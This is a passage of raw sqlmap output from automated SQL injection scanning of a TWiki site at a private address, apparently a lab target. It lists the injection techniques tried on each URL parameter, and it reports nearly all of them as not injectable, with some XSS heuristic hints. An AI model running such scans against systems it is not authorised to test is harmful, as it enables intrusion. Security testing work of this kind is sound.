[20:10:54] [INFO] testing if GET parameter 'rev' is dynamic
[20:10:55] [WARNING] GET parameter 'rev' does not appear dynamic
[20:10:55] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[20:10:55] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[20:10:55] [INFO] testing for SQL injection on GET parameter 'rev'
[20:10:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:10:55] [WARNING] reflective value(s) found and filtering out
[20:10:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:10:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:10:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:10:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:10:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:10:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:10:59] [INFO] testing 'MySQL inline queries'
[20:10:59] [INFO] testing 'PostgreSQL inline queries'
[20:11:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:11:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:11:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:11:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:11:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:11:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:11:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:11:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:11:03] [INFO] testing 'Oracle AND time-based blind'
[20:11:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:11:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:11:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:11:19] [WARNING] GET parameter 'rev' is not injectable
[20:11:19] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[20:11:19] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebHome?rev1=1.78&rev2=1.77'
[20:11:19] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?rev=1.77'
URL 173:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WebHome?template=oopsmore&param1=1.79&param2=1.79
do you want to test this URL? [Y/n/q]
> Y
[20:11:19] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WebHome?template=oopsmore&param1=1.79&param2=1.79'
[20:11:19] [INFO] testing connection to the target URL
[20:11:19] [INFO] testing if the target URL is stable
[20:11:20] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[20:11:20] [INFO] testing if GET parameter 'template' is dynamic
[20:11:20] [INFO] confirming that GET parameter 'template' is dynamic
[20:11:20] [INFO] GET parameter 'template' is dynamic
[20:11:20] [INFO] heuristics detected web page charset 'ascii'
[20:11:20] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[20:11:20] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[20:11:20] [INFO] testing for SQL injection on GET parameter 'template'
[20:11:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:11:20] [WARNING] reflective value(s) found and filtering out
[20:11:21] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:11:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:11:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:11:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:11:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:11:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:11:23] [INFO] testing 'MySQL inline queries'
[20:11:23] [INFO] testing 'PostgreSQL inline queries'
[20:11:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:11:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:11:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:11:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:11:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:11:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:11:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:11:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:11:26] [INFO] testing 'Oracle AND time-based blind'
[20:11:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:11:27] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:11:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:11:36] [WARNING] GET parameter 'template' is not injectable
[20:11:36] [INFO] testing if GET parameter 'param1' is dynamic
[20:11:36] [WARNING] GET parameter 'param1' does not appear dynamic
[20:11:36] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[20:11:36] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[20:11:36] [INFO] testing for SQL injection on GET parameter 'param1'
[20:11:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:11:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:11:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:11:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:11:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:11:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:11:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:11:41] [INFO] testing 'MySQL inline queries'
[20:11:41] [INFO] testing 'PostgreSQL inline queries'
[20:11:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:11:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:11:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:11:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:11:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:11:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:11:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:11:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:11:46] [INFO] testing 'Oracle AND time-based blind'
[20:11:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:11:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:12:03] [WARNING] GET parameter 'param1' is not injectable
[20:12:03] [INFO] testing if GET parameter 'param2' is dynamic
[20:12:03] [WARNING] GET parameter 'param2' does not appear dynamic
[20:12:03] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[20:12:04] [INFO] testing for SQL injection on GET parameter 'param2'
[20:12:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:12:05] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:12:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:12:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:12:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:12:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:12:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:12:08] [INFO] testing 'MySQL inline queries'
[20:12:08] [INFO] testing 'PostgreSQL inline queries'
[20:12:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:12:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:12:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:12:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:12:10] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:12:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:12:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:12:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:12:13] [INFO] testing 'Oracle AND time-based blind'
[20:12:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:12:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:12:26] [INFO] target URL appears to be UNION injectable with 10 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:12:31] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[20:12:32] [INFO] target URL appears to be UNION injectable with 1 columns
[20:12:35] [WARNING] GET parameter 'param2' is not injectable
[20:12:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 174:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WebPreferences?t=1441457711
do you want to test this URL? [Y/n/q]
> Y
[20:12:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WebPreferences?t=1441457711'
[20:12:35] [INFO] testing connection to the target URL
[20:12:36] [INFO] testing if the target URL is stable
[20:12:37] [INFO] target URL is stable
[20:12:37] [INFO] testing if GET parameter 't' is dynamic
[20:12:37] [WARNING] GET parameter 't' does not appear dynamic
[20:12:37] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[20:12:37] [INFO] testing for SQL injection on GET parameter 't'
[20:12:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:12:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:12:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:12:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:12:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:12:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:12:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:12:40] [INFO] testing 'MySQL inline queries'
[20:12:40] [INFO] testing 'PostgreSQL inline queries'
[20:12:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:12:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:12:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:12:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:12:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:12:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:12:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:12:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:12:44] [INFO] testing 'Oracle AND time-based blind'
[20:12:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:12:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:12:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:12:56] [WARNING] GET parameter 't' is not injectable
[20:12:56] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 175:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Web *Preferences[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[20:12:56] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Web *Preferences[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[20:12:56] [INFO] testing connection to the target URL
[20:12:56] [INFO] testing if the target URL is stable
[20:12:57] [INFO] target URL is stable
[20:12:57] [INFO] testing if URI parameter '#1*' is dynamic
[20:12:57] [INFO] confirming that URI parameter '#1*' is dynamic
[20:12:57] [INFO] URI parameter '#1*' is dynamic
[20:12:57] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:12:57] [INFO] testing for SQL injection on URI parameter '#1*'
[20:12:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:12:58] [WARNING] reflective value(s) found and filtering out
[20:12:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:12:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:13:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:13:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:13:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:13:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:13:02] [INFO] testing 'MySQL inline queries'
[20:13:02] [INFO] testing 'PostgreSQL inline queries'
[20:13:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:13:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:13:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:13:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:13:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:13:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:13:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:13:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:13:06] [INFO] testing 'Oracle AND time-based blind'
[20:13:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:13:06] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:13:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:13:17] [WARNING] URI parameter '#1*' is not injectable
[20:13:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 176:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?skin=print
do you want to test this URL? [Y/n/q]
> Y
[20:13:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?skin=print'
[20:13:17] [INFO] testing connection to the target URL
[20:13:17] [INFO] testing if the target URL is stable
[20:13:18] [INFO] target URL is stable
[20:13:18] [INFO] testing if GET parameter 'skin' is dynamic
[20:13:18] [INFO] confirming that GET parameter 'skin' is dynamic
[20:13:18] [INFO] GET parameter 'skin' is dynamic
[20:13:18] [INFO] heuristics detected web page charset 'ascii'
[20:13:18] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[20:13:18] [INFO] testing for SQL injection on GET parameter 'skin'
[20:13:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:13:18] [WARNING] reflective value(s) found and filtering out
[20:13:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:13:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:13:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:13:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:13:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:13:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:13:22] [INFO] testing 'MySQL inline queries'
[20:13:22] [INFO] testing 'PostgreSQL inline queries'
[20:13:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:13:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:13:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:13:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:13:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:13:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:13:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:13:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:13:25] [INFO] testing 'Oracle AND time-based blind'
[20:13:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:13:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:13:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:13:37] [WARNING] GET parameter 'skin' is not injectable
[20:13:37] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 177:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.18&rev2=1.17
do you want to test this URL? [Y/n/q]
> Y
[20:13:37] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.18&rev2=1.17'
[20:13:37] [INFO] testing connection to the target URL
[20:13:38] [INFO] testing if the target URL is stable
[20:13:38] [INFO] target URL is stable
[20:13:38] [INFO] testing if GET parameter 'rev1' is dynamic
[20:13:39] [WARNING] GET parameter 'rev1' does not appear dynamic
[20:13:39] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[20:13:39] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks
[20:13:39] [INFO] testing for SQL injection on GET parameter 'rev1'
[20:13:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:13:39] [WARNING] reflective value(s) found and filtering out
[20:13:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:13:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:13:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:13:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:13:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:13:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:13:43] [INFO] testing 'MySQL inline queries'
[20:13:43] [INFO] testing 'PostgreSQL inline queries'
[20:13:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:13:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:13:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:13:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:13:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:13:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:13:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:13:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:13:46] [INFO] testing 'Oracle AND time-based blind'
[20:13:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:13:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:13:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:13:59] [WARNING] GET parameter 'rev1' is not injectable
[20:13:59] [INFO] testing if GET parameter 'rev2' is dynamic
[20:13:59] [INFO] confirming that GET parameter 'rev2' is dynamic
[20:13:59] [INFO] GET parameter 'rev2' is dynamic
[20:13:59] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[20:13:59] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks
[20:13:59] [INFO] testing for SQL injection on GET parameter 'rev2'
[20:13:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:14:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:14:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:14:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:14:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:14:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:14:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:14:04] [INFO] testing 'MySQL inline queries'
[20:14:04] [INFO] testing 'PostgreSQL inline queries'
[20:14:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:14:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:14:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:14:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:14:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:14:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:14:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:14:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:14:08] [INFO] testing 'Oracle AND time-based blind'
[20:14:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:14:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:14:21] [WARNING] GET parameter 'rev2' is not injectable
[20:14:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 178:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?rev=1.17
do you want to test this URL? [Y/n/q]
> Y
[20:14:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?rev=1.17'
[20:14:21] [INFO] testing connection to the target URL
[20:14:21] [INFO] testing if the target URL is stable
[20:14:22] [INFO] target URL is stable
[20:14:22] [INFO] testing if GET parameter 'rev' is dynamic
[20:14:22] [WARNING] GET parameter 'rev' does not appear dynamic
[20:14:22] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[20:14:22] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[20:14:22] [INFO] testing for SQL injection on GET parameter 'rev'
[20:14:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:14:22] [WARNING] reflective value(s) found and filtering out
[20:14:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:14:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:14:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:14:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:14:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:14:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:14:26] [INFO] testing 'MySQL inline queries'
[20:14:26] [INFO] testing 'PostgreSQL inline queries'
[20:14:26] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:14:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:14:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:14:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:14:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:14:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:14:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:14:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:14:30] [INFO] testing 'Oracle AND time-based blind'
[20:14:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:14:31] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:14:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:14:43] [WARNING] GET parameter 'rev' is not injectable
[20:14:43] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[20:14:43] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.17&rev2=1.16'
[20:14:43] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?rev=1.16'
URL 179:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore&param1=1.18&param2=1.18
do you want to test this URL? [Y/n/q]
> Y
[20:14:43] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore&param1=1.18&param2=1.18'
[20:14:43] [INFO] testing connection to the target URL
[20:14:43] [INFO] testing if the target URL is stable
[20:14:44] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[20:14:44] [INFO] testing if GET parameter 'template' is dynamic
[20:14:44] [INFO] confirming that GET parameter 'template' is dynamic
[20:14:44] [INFO] GET parameter 'template' is dynamic
[20:14:44] [INFO] heuristics detected web page charset 'ascii'
[20:14:44] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[20:14:44] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[20:14:44] [INFO] testing for SQL injection on GET parameter 'template'
[20:14:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:14:45] [WARNING] reflective value(s) found and filtering out
[20:14:45] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:14:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:14:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:14:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:14:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:14:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:14:47] [INFO] testing 'MySQL inline queries'
[20:14:47] [INFO] testing 'PostgreSQL inline queries'
[20:14:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:14:48] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:14:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:14:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
